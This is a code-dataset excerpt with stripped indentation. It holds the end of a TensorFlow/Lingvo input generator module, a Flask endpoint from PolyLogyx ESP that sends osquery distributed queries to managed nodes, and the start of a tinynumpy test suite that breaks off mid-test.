'This input generator does not support p.use_per_host_infeed. '
'Please set it to False, or move the call to self._BuildDataSource() '
'from self.__init__() to self._InputBatch() for batches to be '
'correctly replicated per host.')
if not p.file_datasource and p.file_pattern:
# This is a workaround for subclasses which have defined
# their own data source-like functionality.
tf.logging.info(
'Creating data source-like output from class %s using '
'file_pattern %s', self, p.file_pattern)
ret = py_utils.NestedMap()
ret.data = self._DataSourceFromFilePattern(p.file_pattern)
else:
tf.logging.info(
'Building data source %s with params %s and '
'file_pattern %s', self.datasource, self.datasource.params,
p.file_pattern)
batch = self.datasource.GetNext()
ret = self.datasource.GetMeta()
ret.data = batch
if 'selected_bprop' in ret:
self._bprop_onehot = ret.selected_bprop
if 'bprop_variable_filters' in ret:
self._bprop_variable_filters = ret.bprop_variable_filters
if 'source_selected' not in ret:
ret.source_selected = None
return ret
def _BuildDataSource(self):
"""Read and return input batch from `p.file_pattern`.
Same as _BuildDataSourceWithMetadata but does not return any metadata.
Returns:
A `.NestedMap` of tf.Tensor as in `self._DataSourceFromFilePattern()`.
Raises:
ValueError: If unknown token type.
"""
return self._BuildDataSourceWithMetadata()['data']
class BaseSequenceInputGenerator(BaseInputGeneratorFromFiles):
"""The basic sequence input generator.
Subclasses should implement _DataSourceFromFilePattern defined in
BaseInputGeneratorFromFiles.
"""
@classmethod
def Params(cls):
"""Defaults params for sequence input generators."""
p = super().Params()
p.Delete('batch_size')
# How input should be bucketized.
p.Define(
'bucket_upper_bound', [2560], 'Bucketing scheme. Required to be'
'a sorted list of integers. Examples that are longer than all bucket'
'upper bounds are skipped.')
p.Define(
'bucket_batch_limit', [8],
'Desired per-split batch size per bucket. Scaled in '
'infeed_bucket_batch_limit to the infeed size.'
'Must be the same length as bucket_upper_bound.')
p.Define(
'bucket_adjust_every_n', 0, 'If non-zero, optimize the values of '
'bucket_upper_bound except the last one after every N records '
'based on the current input length distribution.')
p.Define('source_max_length', None,
'The maximum length of the source sequence.')
p.Define('target_max_length', 300,
'The maximum length of the target sequence.')
p.Define('pad_to_max_seq_length', False,
'If True, input tensors will be padded to max_length.')
p.Define('tokenizer', tokenizers.AsciiTokenizer.Params(),
'Tokenizer params.')
p.Define(
'tokenizer_dict', {},
'If multiple tokenizers are required, they can be accessed through '
'this dict via a key.')
return p
def __init__(self, params):
super().__init__(params)
p = self.params
if p.tokenizer:
assert DEFAULT_TOKENIZER_KEY not in p.tokenizer_dict
p.tokenizer_dict[DEFAULT_TOKENIZER_KEY] = p.tokenizer
self.tokenizer_dict = {}
for k, p in p.tokenizer_dict.items():
if p:
name = '_tokenizer_' + k
self.CreateChild(name, p)
self.tokenizer_dict[k] = self.children[name]
else:
self.tokenizer_dict[k] = None
if DEFAULT_TOKENIZER_KEY in self.tokenizer_dict:
self.tokenizer = self.tokenizer_dict[DEFAULT_TOKENIZER_KEY]
@property # Adjust batch size according to the cluster spec.
def infeed_bucket_batch_limit(self):
"""Returns the bucket batch limit for one infeed host."""
p = self.params
infeed_bucket_batch_limit = [
batch_utils.scale_split_to_infeed(b, p.use_per_host_infeed)
for b in p.bucket_batch_limit
]
tf.logging.info(
'infeed_bucket_batch_limit={} num_splits_per_client={} bucket_batch_limit={}'
.format(infeed_bucket_batch_limit, self.cluster.num_splits_per_client,
p.bucket_batch_limit))
return infeed_bucket_batch_limit
def InfeedBatchSize(self):
"""Returns the batch size of one infeed pipeline.
Override in subclass to provide dynamically shaped infeed batch size.
If use_per_host_infeed is False then there is only one infeed pipeline and
then the GlobalBatchSize() and the InfeedBatchSize() is the same.
"""
buckets = self.infeed_bucket_batch_limit
if any(x != buckets[0] for x in buckets):
tf.logging.warning('Using max bucket batch limit but not all limits are '
'the same {}'.format(buckets))
infeed_size = max(buckets)
tf.logging.info('InfeedBatchSize: %d', infeed_size)
return infeed_size
def _InputOpBucketingArgs(self):
p = self.params
bucket_batch_limit = self.infeed_bucket_batch_limit
tf.logging.info('infeed_bucket_batch_limit %r', bucket_batch_limit)
return {
'bucket_upper_bound': p.bucket_upper_bound,
'bucket_batch_limit': bucket_batch_limit,
'bucket_adjust_every_n': p.bucket_adjust_every_n,
}
def StringsToIds(self,
strs,
is_source=False,
external_max_length=None,
external_append_eos=None,
key=None,
languages=None):
"""Tokenize strs into vocab ids.
Args:
strs: A vector of strings.
is_source: A bool to indicate whether to use `source_max_length` to pad
'strs'.
external_max_length: An int providing the max_length for strs.
external_append_eos: Bool or None. If None, will be ignored and
`params.append_eos` will be used. If bool, will determine if an eos
symbol will be added to tokens.
key: A string key in case the model has multiple tokenizers.
languages: A vector of str with the same length as `strs`.
Returns:
A tuple (ids, labels, paddings) with the same shape [batch, maxlen].
- ids[i, j] is the input token id of i-th sample for j-th step.
- labels[i, j] is the target token id of i-th sample for j-th step.
- paddings[i, j] is 1 iff i-th sample's j-th step is padded.
Usually ids[i, 0] == SOS, ids[i, j+1] == labels[i, j], and labels[i, :]
ends with EOS. That is, `ids` and `labels` are inputs and ground-truth
labels for step-by-step teacher-forcing training, respectively.
Raises:
ValueError: If unknown token type.
"""
p = self.params
if external_max_length is not None:
maxlen = external_max_length
elif is_source:
maxlen = p.source_max_length
else:
maxlen = p.target_max_length
key = key or DEFAULT_TOKENIZER_KEY
return self.tokenizer_dict[key].StringsToIds(
strs, maxlen, external_append_eos, languages=languages)
def StringsToIdsWithOffsets(self,
strs,
is_source=False,
external_max_length=None,
external_append_eos=None,
key=None,
languages=None):
"""Tokenize strs into vocab ids, and also return byte-level offsets.
Args:
strs: A vector of strings.
is_source: A bool to indicate whether to use `source_max_length` to pad
'strs'.
external_max_length: An int providing the max_length for strs.
external_append_eos: Bool or None. If None, will be ignored and
`params.append_eos` will be used. If bool, will determine if an eos
symbol will be added to tokens.
key: A string key in case the model has multiple tokenizers.
languages: A vector of str with the same length as `strs`.
Returns:
A tuple (ids, labels, paddings) with the same shape [batch, maxlen].
- ids[i, j] is the input token id of i-th sample for j-th step.
- labels[i, j] is the target token id of i-th sample for j-th step.
- paddings[i, j] is 1 iff i-th sample's j-th step is padded.
- start_offset[i, j] is the byte-level offset of the start of the j-th id
in the i-th original string
- end_offset[i, j] is the byte-level offset of the end of the j-th id
in the i-th original string
Usually ids[i, 0] == SOS, ids[i, j+1] == labels[i, j], and labels[i, :]
ends with EOS. That is, `ids` and `labels` are inputs and ground-truth
labels for step-by-step teacher-forcing training, respectively.
Raises:
ValueError: If unknown token type.
Exception: If the specified tokenizer does not support offsets.
"""
p = self.params
if external_max_length is not None:
maxlen = external_max_length
elif is_source:
maxlen = p.source_max_length
else:
maxlen = p.target_max_length
key = key or DEFAULT_TOKENIZER_KEY
return self.tokenizer_dict[key].StringsToIdsWithOffsets(
strs, maxlen, external_append_eos, languages=languages)
def IdsToStrings(self, ids, lens, key=None):
"""Converts ids back to strings.
Args:
ids: A matrix of shape [batch, seqlen]. ids[i, :] is the i-th sample's
ids.
lens: A vector of shape [batch]. lens[i] is the sequence length of the
i-th sample. Only the first lens[i] tokens in ids[i, :] are valid tokens
for the i-th sequence.
key: A string key in case the model has multiple tokenizers.
Returns:
sequences - A vector of shape [batch]. The converted string sequence.
Raises:
ValueError: If unknown token type.
"""
key = key or DEFAULT_TOKENIZER_KEY
return self.tokenizer_dict[key].IdsToStrings(ids, lens)
def Cast(self, v):
"""Cast tensor dtype to fprop_dtype."""
if not v.dtype.is_floating:
return v
return tf.cast(v, py_utils.FPropDtype(self.params))
class BaseTinyDatasetInput(BaseInputGenerator):
"""Input generator for tiny dataset which are stored in tf checkpoint.
| Input batch (b: batch size, h: height, w: width, d: depth):
| raw: Samples. [b, h, w, d].
| data: Preprocessed samples. [b, h, w, d].
| label: Labels. [b].
| weight: [b]. weight[i] is 1.0 if i-th sample is considered to
| be a real example. Otherwise, weight[i] is 0.0.
"""
@classmethod
def Params(cls):
"""Defaults params."""
p = super().Params()
p.Define('ckpt', None, 'A TensorFlow checkpoint.')
p.Define('data', 'x_train', 'The tensor name in the ckpt.')
p.Define('data_dtype', tf.uint8, 'The tensor dtype in the ckpt.')
p.Define(
'data_shape', (0, 0, 0), 'A tuple of ints. E.g., a tiny image '
'has the shape (height, weight, depth).')
p.Define('label', 'y_train', 'The tensor name in the ckpt.')
p.Define('label_dtype', tf.uint8, 'The tensor dtype in the ckpt.')
p.Define('repeat', True, 'If true, goes through the dataset repeatedly.')
p.use_per_host_infeed = True
return p
def _InputBatch(self):
p = self.params
@tf.function
def ReadData():
x, y = io_ops.restore_v2(p.ckpt, [p.data, p.label], [''] * 2,
[p.data_dtype, p.label_dtype])
# Always convert to float32.
return tf.cast(x, tf.float32), tf.cast(y, tf.float32)
# Loads data and label into memory and keep it around.
data, label = ops.cached_call(
f=ReadData.get_concrete_function(), T=[tf.float32, tf.float32])
b, shape = self.InfeedBatchSize(), list(p.data_shape)
data = tf.reshape(data, [-1] + shape)
label = tf.reshape(label, [-1])
label = py_utils.HasShape(label, [tf.shape(data)[0]])
sample_ids = ops.random_permutation_sequence(
num=p.num_samples,
batch=b,
repeat=p.repeat,
seed=p.random_seed if p.random_seed else 0)
n = tf.shape(sample_ids)[0]
raw = py_utils.PadOrTrimTo(tf.gather(data, sample_ids), [b] + shape)
ret = py_utils.NestedMap(
raw=raw,
data=self._Preprocess(raw),
label=py_utils.PadOrTrimTo(tf.gather(label, sample_ids), [b]),
weight=py_utils.PadOrTrimTo(tf.ones([n], dtype=tf.float32), [b]))
if not py_utils.use_tpu():
ret['sample_ids'] = sample_ids
return ret
def _Preprocess(self, raw):
return raw
class TFDataSequenceInputGenerator(BaseSequenceInputGenerator):
"""tf.data input pipeline for sequences.
Inherits params from BaseSequenceInputGenerator so this can be a drop-in
replacement for existing input generators inheriting from
BaseSequenceInputGenerator. However, many params may be ignored / unused.
"""
@classmethod
def Params(cls):
p = super().Params()
p.Define('prefetch_buffer_size', 1, 'Local prefetch buffer size.')
p.resettable = True
return p
def CreateDatasource(self):
p = self.params
if not p.file_datasource:
# Convert p.file_pattern into p.file_datasource.
ds = self.ConvertFilePatternToDataSource(p, p.file_pattern)
p.file_pattern = ''
else:
ds = p.file_datasource
ds = datasource.CustomTFDatasetTransform.Params().Set(
sub=ds, fn='TakeEvalSamples')
ds = datasource.TFDatasetBatchBySequenceLength.Params().Set(
sub=ds,
seqlen_fn='GetSequenceLength',
input_shape_fn='_InputShape',
input_padding_fn='_InputPaddingValue',
bucket_upper_bound=p.bucket_upper_bound,
bucket_batch_limit=p.bucket_batch_limit)
if self.cluster.tf_data_service_address:
ds = datasource.TFDataServiceSource.Params().Set(
sub=ds, bucket_upper_bound=p.bucket_upper_bound)
ds = datasource.TFDatasetPrefetch.Params().Set(
sub=ds, buffer_size=p.prefetch_buffer_size)
p.file_datasource = ds
super().CreateDatasource()
@classmethod
def ConvertFilePatternToDataSource(cls, p, file_pattern):
if isinstance(file_pattern, str):
file_patterns = file_pattern.split(',')
weights = None
else:
if all([isinstance(x, str) for x in file_pattern]):
file_patterns = file_pattern
weights = None
elif all([isinstance(x, tuple) for x in file_pattern]):
file_patterns, weights = zip(*file_pattern)
else:
raise ValueError(
f'file_pattern must be all strings or all tuples, but got: '
f'{file_pattern}.')
for fp in file_patterns:
if ',' in fp:
raise ValueError(f'file_pattern should not contain comma: {fp}')
ds = []
for fp in file_patterns:
ds.append(datasource.TFDatasetFnInput.Params().Set(
load_fn='LoadDataset',
kwargs=dict(file_pattern=fp),
shuffle_buffer_size=p.file_buffer_size))
if len(ds) > 1:
if not p.use_within_batch_mixing:
raise ValueError(
'Only p.use_within_batch_mixing is supported with multiple '
'file_patterns.')
ds = [datasource.TFDatasetMixer.Params().Set(sub=ds, weights=weights)]
ds = datasource.CustomTFDatasetTransform.Params().Set(
sub=ds[0], fn='ProcessDataset')
return ds
def Reset(self, sess):
self.datasource.Reset(sess)
def GetPreprocessedInputBatch(self):
return self.datasource.GetNext()
def LoadDataset(self, file_pattern):
"""Load a dataset from file.
Args:
file_pattern: the path to the file to load.
Returns:
A tf.data.Dataset() whose elements represent a single training sample
without a leading batch dim.
"""
raise NotImplementedError()
def TakeEvalSamples(self, dataset):
p = self.params
if self.do_eval and p.num_samples > 0:
dataset = dataset.take(p.num_samples)
return dataset
def ProcessDataset(self, dataset):
"""Processes a dataset returned by LoadDataset.
Args:
dataset: A dataset returned by LoadDataset.
Returns:
A processed dataset containing NestedMaps of Tensors without a leading
batch dimension.
"""
raise NotImplementedError()
def GetSequenceLength(self, example):
"""Returns sequence length for the example NestedMap from the dataset.
Args:
example: A NestedMap containing an input example. Tensors in the example
do not have a leading batch dimension.
Returns:
An integer sequence length for the example.
"""
raise NotImplementedError()
def _InputShape(self, key):
"""Returns the final shape of the tensor corresponding to key as a tuple.
The shape should not include a leading batch dimension.
Args:
key: The NestedMap key to return shape for.
"""
if key in ('source_id', 'bucket_keys'):
return ()
raise ValueError('Unexpected key %s' % key)
def _InputPaddingValue(self, key, tensorspec):
"""Returns the value to pad the tensor corresponding to key with."""
if key.endswith('_paddings'):
return tf.ones([], dtype=tensorspec.dtype)
else:
return tf.zeros([], dtype=tensorspec.dtype)
class BaseDataExampleInputGenerator(BaseInputGenerator):
"""Base class for input generators that read Feature protos via tf.data."""
@classmethod
def Params(cls):
p = super().Params()
p.Define('input_files', None, 'Delimited glob of input files.')
p.Define(
'dataset_type', None,
'A dataset class constructor such as tf.data.TFRecordDataset. '
'The class constructor must take a list of filenames and produce an '
'object that extends tf.data.Dataset.')
p.Define('randomize_order', True, 'Whether to randomize the order.')
p.Define('parallel_readers', 1, 'Number of parallel reader threads.')
p.Define('num_examples', -1, 'Number of examples (-1 for unlimited).')
p.Define(
'num_epochs', -1,
'Number of passes through the data to make (-1 for unlimited).'
'`tf.errors.OutOfRangeError` is thrown after the limit is reached.')
p.Define('randomize_shuffle_size', 500,
'Size of the random shuffle buffer.')
return p
def __init__(self, params):
super().__init__(params)
p = params
assert p.input_files, (
'input_files is required for a tf.data example input generator')
assert p.dataset_type, (
'dataset_type is required for a tf.data example input generator')
def GetFeatureSpec(self):
"""Subclasses must implement and return a feature spec.
Returns:
NestedMap of features compatible with tf.io.parse_example. Default
implementation returns an empty dict.
"""
return {}
def _AdditionalPreprocessInputBatch(self, batch):
"""Additionally preprocesses input batch from iterator.get_next().
Args:
batch: A NestedMap (or list of NestedMaps when using TPU sharded infeed)
containing input tensors in the format returned by
_PreprocessInputBatch.
Returns:
A NestedMap containing additionally preprocessed inputs to feed to the
model.
"""
return batch
def GetPreprocessedInputBatch(self):
p = self.params
def ParseAndProcess(*cols):
"""Parses a Tensorflow example into features."""
# Assume either one or two column input. If one, then the record is
# assumed to be that column. If 2, then it is assumed to be a KV store
# and the record is the second column.
assert len(cols) in [
1, 2
], ('BaseExampleInputGenerator supports one or two column input')
record = cols[-1]
feature_spec = self.GetFeatureSpec()
features = py_utils.NestedMap(tf.io.parse_example(record, feature_spec))
return self._PreprocessInputBatch(features)
dataset_factory = p.dataset_type
dataset = (
tf.data.Dataset.list_files(
p.input_files, shuffle=bool(p.randomize_order)).apply(
tf.data.experimental.parallel_interleave(
dataset_factory,
cycle_length=p.parallel_readers,
sloppy=p.randomize_order)))
if p.randomize_order:
dataset = dataset.shuffle(p.randomize_shuffle_size)
dataset = dataset.take(p.num_examples)
dataset = dataset.repeat(p.num_epochs)
dataset = dataset.batch(self.InfeedBatchSize(), drop_remainder=True)
dataset = dataset.map(
ParseAndProcess, num_parallel_calls=p.parallel_readers)
dataset = dataset.prefetch(tf.data.experimental.AUTOTUNE)
iterator = dataset.make_one_shot_iterator()
input_batch = iterator.get_next()
return self._AdditionalPreprocessInputBatch(input_batch)
def DefineTFDataInput(name,
func,
ignore_args=None,
map_args=None,
base_class=BaseInputGenerator):
"""Defines a new InputGenerator class from given tf.data pipeline.
This function allows users to utilize existing tf.data pipelines which are
defined externally, without making binding boilerplates.
The generated InputGenerator behaves like a one-shot iterator of the given
pipeline. If the iterator is designed to be repeated, the returned
InputGenerator will work similarly.
This function generates `Params` automatically by analysing the given
pipeline's signature so that the behavior of the pipeline can be saved into
`Params`.
This function defines the InputGenerator class on the caller's module. To
avoid any confusion, the returned class have to be stored in the module-level
symbol with the same identifier with given `name`.
Example:
>>> # A tf.data pipeline which returns a dict of Tensors.
>>> def my_dataset(begin=0, end=10):
... ds = tf.data.Dataset.from_tensor_slices(tf.range(begin, end))
... return ds.map(lambda x: {'value': x})
>>> # Defines the InputGenerator class for my_dataset.
>>> MyInput = DefineTFDataInput('MyInput', my_dataset)
>>> # Obtains Params of MyInput.
>>> p = MyInput.Params()
>>> assert p.args.begin == 0
>>> assert p.args.end == 10
>>> # Instantiates the InputGenerator from Params.
>>> ig = p.Instantiate()
>>> assert isinstance(ig, MyInput)
>>> # Obtains the data tensors.
>>> # In TFv1:
>>> data = ig.GetPreprocessedInputBatch()
>>> with tf.Session() as sess:
... values = sess.run(data) # {'value': 0}
... values = sess.run(data) # {'value': 1}
... values = sess.run(data) # {'value': 2}
>>> # In TFv2:
>>> values = ig.GetPreprocessedInputBatch() # {'value': 0}
>>> values = ig.GetPreprocessedInputBatch() # {'value': 1}
>>> values = ig.GetPreprocessedInputBatch() # {'value': 2}
Args:
name: A string, representing the name of the new InputGenerator class.
func: A callable to be analysed to generate the new InputGenerator. The
return value of `func` must be a single `tf.data.Dataset` which yields a
dict or its subclasses. The signature (parameter list) of `func` must have
all explicit parameters needed to configure the pipeline. `*args` and
`**kwargs` parameters would be ignored from defining `Params`.
ignore_args: A collection of strings, representing the set of parameter
names to be ignored from defining `Params`.
map_args: A {str: str} dict, representing mappings from existing fields in
`Params()` to `func`'s parameter. These mappings can be used to propagate
some particular Lingvo-specific options defined by others (typically by
super classes: `BaseInputGenerator` or `BaseLayer`) to the given function.
Each entry in the dict represents a `{func_param: layer_param}` pair such
that the `Params().layer_param` field will be mapped to the parameter
`func_param` of `func`. `func_param` won't be added into `Params().args`
to avoid duplicated definitions about the same parameters.
base_class: A class name to inherit from, default is BaseInputGenerator.
Returns:
A new InputGenerator class that invokes `func` internally. The `Params()`
method of the returned class makes a new Params containing the `args` field
representing the parameters of `func`. The `GetPreprocessedInputBatch()`
method returns a `py_utils.NestedMap` representing the same dict of the
obtained data from the dataset.
"""
ignore_args = set(ignore_args if ignore_args is not None else ())
map_args = dict(map_args if map_args is not None else {})
# Defines the class first as it will be required to call `super()`.
generated_cls = type(name, (base_class,), {})
@classmethod
def _Params(cls):
"""Generates Params to configure the InputGenerator.
This function analyses the signature of the given callable `func` and
defines corresponding fields into `Params` to the obtained function
parameters.
Returns:
An `InstantiableParams` object representing the InputGenerator. It has the
`args` field which contains the set of parameters of `func`.
"""
# Keys in `map_args` will also be ignored.
actual_ignore_args = ignore_args | set(map_args.keys())
p = super(generated_cls, cls).Params()
# Introduces a new group `args` to avoid confusion between `func`'s
# parameters and existing params defined by super classes.
# TODO(oday): For better UX, consider removing this nested field and add
# `func`s parameters to `p` directly. We need to make sure that there are no
# side effects by integrating `func`'s parameters and follows:
# - BaseInputGenerator.Params()
# - BaseLayer.Params()
# - InstantiableParams.cls
p.Define('args', hyperparams.Params(), 'Parameter list of the pipeline.')
inspect_utils.DefineParams(func, p.args, actual_ignore_args)
ds = datasource.TFDatasetFnInput.Params().Set(
load_fn='GetDataset', shuffle_buffer_size=1)
if cluster_factory.Current().tf_data_service_address:
ds = datasource.TFDataServiceSource.Params().Set(sub=ds)
ds = datasource.TFDatasetPrefetch.Params().Set(sub=ds)
p.file_datasource = ds
return p
def _GetDataset(self):
p = self.params
overrides = {k: p.Get(v) for k, v in map_args.items()}
dataset = inspect_utils.CallWithParams(func, p.args, **overrides)
assert isinstance(dataset, (tf.tf1.data.Dataset, tf.tf2.data.Dataset)), (
'DefineTFDataInput must take a callable which returns a '
'`tf.data.Dataset`. The given callable `%s` returned `%s`' %
(func, dataset))
return dataset
def _GetPreprocessedInputBatch(self):
"""Generates data tensors by invoking the pipeline."""
# TFv1: Returns Tensors which will be determined by Session.run().
# TFv2: Returns Tensors with actual values.
data = self.datasource.GetNext()
# Converts dict to NestedMap to maintain consistency with existing
# functionalities in base_input_generator.
# TODO(oday): Consider mitigating this restriction.
assert isinstance(data, dict), (
'DefineTFDataInput accepts only datasets that returns a dict or its '
'subclasses.')
if not isinstance(data, py_utils.NestedMap):
data = py_utils.NestedMap.FromNestedDict(data)
return data
# Overrides member methods.
generated_cls.Params = _Params
generated_cls.GetDataset = _GetDataset
generated_cls.GetPreprocessedInputBatch = _GetPreprocessedInputBatch
# Sets __module__ to the caller's module name for pickling and restoring from
# Params to work.
# See also the namedtuple's implementation for details.
module = inspect.stack()[1].frame.f_globals.get('__name__', '__main__')
generated_cls.__module__ = module
return generated_cls
| 41.342193
| 95
| 0.680676
|
4a15b86a50fabe20130acdacc82ad86a90f2218b
| 3,846
|
py
|
Python
|
plgx-esp-ui/polylogyx/blueprints/distributed.py
|
dhoomakethu/plgx-esp
|
b466b52a5e16a0d12a61e505e48add83bee5bad4
|
[
"MIT"
] | 20
|
2019-12-09T13:55:13.000Z
|
2022-01-10T09:10:42.000Z
|
plgx-esp-ui/polylogyx/blueprints/distributed.py
|
dhoomakethu/plgx-esp
|
b466b52a5e16a0d12a61e505e48add83bee5bad4
|
[
"MIT"
] | 13
|
2019-12-03T13:27:27.000Z
|
2021-12-03T05:22:49.000Z
|
plgx-esp-ui/polylogyx/blueprints/distributed.py
|
dhoomakethu/plgx-esp
|
b466b52a5e16a0d12a61e505e48add83bee5bad4
|
[
"MIT"
] | 16
|
2019-11-15T11:45:06.000Z
|
2022-01-07T08:07:11.000Z
|
from sqlalchemy import or_
import json
import datetime as dt
from flask import jsonify, request, current_app
from flask_restplus import Namespace, Resource, marshal
from polylogyx.models import db
from .utils import *
from polylogyx.utils import require_api_key, create_tags, get_tags, validate_osquery_query
from polylogyx.dao import nodes_dao as nodedao
from polylogyx.dao import distributed_dao as dao
from polylogyx.wrappers import query_wrappers as wrapper
from polylogyx.wrappers import parent_wrappers as parentwrapper
ns = Namespace('distributed', description='distributed query related operations')
# Distributed Query section
@require_api_key
@ns.route('/add', endpoint = 'distributed_add')
@ns.doc(params={'query':'query', 'tags': 'tags', 'nodes':'nodes', 'description':'description for the post method'})
class DistributedQueryClass(Resource):
'''
Retrieve an osquery configuration for a given node.
returns: an osquery configuration file
'''
parser = requestparse(['query','tags','nodes','description'],[str, str, str, str],['query','tags list string seperated by commas','nodes list by comma separated','description'],[True, False, False, False])
@ns.expect(parser)
def post(self, node=None):
from manage import declare_queue
args = self.parser.parse_args() # need to exists for input payload validation
onlineNodes = 0
sql = args['query']
if not validate_osquery_query(sql):
message = u'Field must contain valid SQL to be run against osquery tables'
else:
status = 'success'
message = 'Successfully send the distributed query'
tag_all = 'all'
current_app.logger.info(
"%s - %s checking in for distributed query",
request.remote_addr, node
)
# all nodes get this query
nodes = []
tags = []
if args['tags']:
tags = args['tags'].split(',')
if args['nodes']:
nodeKeyList = args['nodes'].split(',')
else:
nodeKeyList = []
if not nodeKeyList and not tags:
# all nodes get this query
nodes = nodedao.get_all_nodes()
if nodeKeyList:
nodes = nodedao.extendNodesByNodeKeyList(nodeKeyList)
if tags:
nodes = nodedao.extendNodesByTag(tags)
query = dao.add_distributed_query(sql,args['description'])
win_sql_query = None
typed_query = query.sql
query_windows_specific = False
if 'win_file_events' in query.sql or 'win_process_events' in query.sql:
win_sql_query = typed_query
query_windows_specific = True
elif 'file_events' in query.sql:
win_sql_query = query.sql.replace('file_events', 'win_file_events')
elif 'process_events' in query.sql:
win_sql_query = query.sql.replace('process_events', 'win_process_events')
for node in nodes:
if node.node_is_active():
onlineNodes += 1
task = dao.create_distributed_task_obj(node, query)
if node.platform == 'windows':
task.sql = win_sql_query
if not (node.platform != 'windows' and query_windows_specific):
db.session.add(task)
else:
db.session.commit()
declare_queue(query.id)
if onlineNodes == 0:
message = 'No active node present'
else:
return marshal({'query_id': query.id}, wrapper.add_query_wrapper)
return marshal(respcls(message), parentwrapper.failure_response_parent)
| 39.649485
| 209
| 0.611544
|
4a15b8ae7a52fc7ee28cbc15314623e9c4064086
| 8,547
|
py
|
Python
|
test_tinynumpy.py
|
almarklein/tinynumpy
|
41edac9123ecbb9222eb28bc3dee507451b9d748
|
[
"MIT"
] | 9
|
2015-06-16T20:02:05.000Z
|
2021-03-02T23:13:14.000Z
|
test_tinynumpy.py
|
almarklein/tinynumpy
|
41edac9123ecbb9222eb28bc3dee507451b9d748
|
[
"MIT"
] | null | null | null |
test_tinynumpy.py
|
almarklein/tinynumpy
|
41edac9123ecbb9222eb28bc3dee507451b9d748
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# Copyright (c) 2014, Almar Klein and Wade Brainerd
# tinynumpy is distributed under the terms of the MIT License.
""" Test suite for tinynumpy
"""
import os
import sys
import ctypes
import pytest
from _pytest import runner
from pytest import raises, skip
import tinynumpy as tnp
# Numpy is optional. If not available, will compare against ourselves.
try:
import numpy as np
except ImportError:
np = tnp
def test_TESTING_WITH_NUMPY():
# So we can see in the result whether numpy was used
if np is None or np is tnp:
skip('Numpy is not available')
def test_shapes_and_strides():
for shape in [(9, ), (109, ),
(9, 4), (109, 104),
(9, 4, 5), (109, 104, 105),
(9, 4, 5, 6), # not (109, 104, 105, 106) -> too big
]:
# Test shape and strides
a = np.empty(shape)
b = tnp.empty(shape)
assert a.ndim == len(shape)
assert a.ndim == b.ndim
assert a.shape == b.shape
assert a.strides == b.strides
assert a.size == b.size
# Also test repr length
if b.size > 100:
assert len(repr(b)) < 80
else:
assert len(repr(b)) > (b.size * 3) # "x.0" for each element
def test_repr():
for dtype in ['float32', 'int32']:
for data in [[1, 2, 3, 4, 5, 6, 7, 8],
[[1, 2], [3, 4], [5, 6], [7, 8]],
[[[1, 2], [3, 4]],[[5, 6], [7, 8]]],
]:
a = np.array(data, dtype)
b = tnp.array(data, dtype)
# Compare line by line (forget leading whitespace)
charscompared = 0
for l1, l2 in zip(repr(a).splitlines(), repr(b).splitlines()):
l1, l2 = l1.rstrip(), l2.rstrip()
l1, l2 = l1.split('dtype=')[0], l2.split('dtype=')[0]
assert l1 == l2
charscompared += len(l1)
assert charscompared > (3 * b.size)
def test_dtype():
for shape in [(9, ), (9, 4), (9, 4, 5)]:
for dtype in ['bool', 'int8', 'uint8', 'int16', 'uint16',
'int32', 'uint32', 'float32', 'float64']:
a = np.empty(shape, dtype=dtype)
b = tnp.empty(shape, dtype=dtype)
assert a.shape == b.shape
assert a.dtype == b.dtype
assert a.itemsize == b.itemsize
raises(TypeError, tnp.zeros, (9, ), 'blaa')
assert tnp.array([1.0, 2.0]).dtype == 'float64'
assert tnp.array([1, 2]).dtype == 'int64'
def test_reshape():
a = np.array([1, 2, 3, 4, 5, 6, 7, 8])
b = tnp.array([1, 2, 3, 4, 5, 6, 7, 8])
for shape in [(2, 4), (4, 2), (2, 2, 2), (8,)]:
a.shape = shape
b.shape = shape
assert a.shape == b.shape
assert a.strides == b.strides
a.shape = 2, 4
b.shape = 2, 4
# Test transpose
assert b.T.shape == (4, 2)
assert (a.T == b.T).all()
assert (b.T.T == b).all()
# Make non-contiguous versions
a2 = a[:, 2:]
b2 = b[:, 2:]
# Test contiguous flag
assert a.flags['C_CONTIGUOUS']
assert not a2.flags['C_CONTIGUOUS']
# Test base
assert a2.base is a
assert b2.base is b
assert a2[:].base is a
assert b2[:].base is b
# Fail
with raises(ValueError): # Invalid shape
a.shape = (3, 3)
with raises(ValueError):
b.shape = (3, 3)
with raises(AttributeError): # Cannot reshape non-contiguous arrays
a2.shape = 4,
with raises(AttributeError):
b2.shape = 4,
def test_from_and_to_numpy():
# This also tests __array_interface__
for dtype in ['float32', 'float64', 'int32', 'uint32', 'uint8', 'int8']:
for data in [[1, 2, 3, 4, 5, 6, 7, 8],
[[1, 2], [3, 4], [5, 6], [7, 8]],
[[[1, 2], [3, 4]],[[5, 6], [7, 8]]],
]:
# Convert from numpy, from tinynumpy, to numpy
a1 = np.array(data, dtype)
b1 = tnp.array(a1)
b2 = tnp.array(b1)
a2 = np.array(b2)
# Check if its the same
for c in [b1, b2, a2]:
assert a1.shape == c.shape
assert a1.dtype == c.dtype
assert a1.strides == c.strides
assert (a1 == c).all()
# Also test using a numpy array as a buffer
a = np.array([[1, 2], [3, 4], [5, 6], [7, 8]], 'float32')
b = tnp.ndarray(a.shape, a.dtype, strides=a.strides, buffer=a.ravel())
assert (a==b).all()
# Test that is indeed same data
a[0, 0] = 99
assert (a==b).all()
def test_from_ctypes():
for type, dtype in [(ctypes.c_int16, 'int16'),
(ctypes.c_uint8, 'uint8'),
(ctypes.c_float, 'float32'),
(ctypes.c_double, 'float64')]:
# Create ctypes array, possibly something that we get from a c lib
buffer = (type*100)()
# Create array!
b = tnp.ndarray((4, 25), dtype, buffer=buffer)
# Check that we can turn it into a numpy array
a = np.array(b, copy=False)
assert (a == b).all()
assert a.dtype == dtype
# Verify that both point to the same data
assert a.__array_interface__['data'][0] == ctypes.addressof(buffer)
assert b.__array_interface__['data'][0] == ctypes.addressof(buffer)
# also verify offset in __array_interface__ here
for a0, b0 in zip([a[2:], a[:, 10::2], a[1::2, 10:20:2]],
[b[2:], b[:, 10::2], b[1::2, 10:20:2]]):
pa = a0.__array_interface__['data'][0]
pb = b0.__array_interface__['data'][0]
assert pa > ctypes.addressof(buffer)
assert pa == pb
def test_from_bytes():
skip('Need ndarray.frombytes or something')
# Create bytes
buffer = b'x' * 100
# Create array!
b = tnp.ndarray((4, 25), 'uint8', buffer=buffer)
ptr = ctypes.cast(buffer, ctypes.c_void_p).value
# Check that we can turn it into a numpy array
a = np.array(b, copy=False)
assert (a == b).all()
# Verify readonly
with raises(Exception):
a[0, 0] = 1
with raises(Exception):
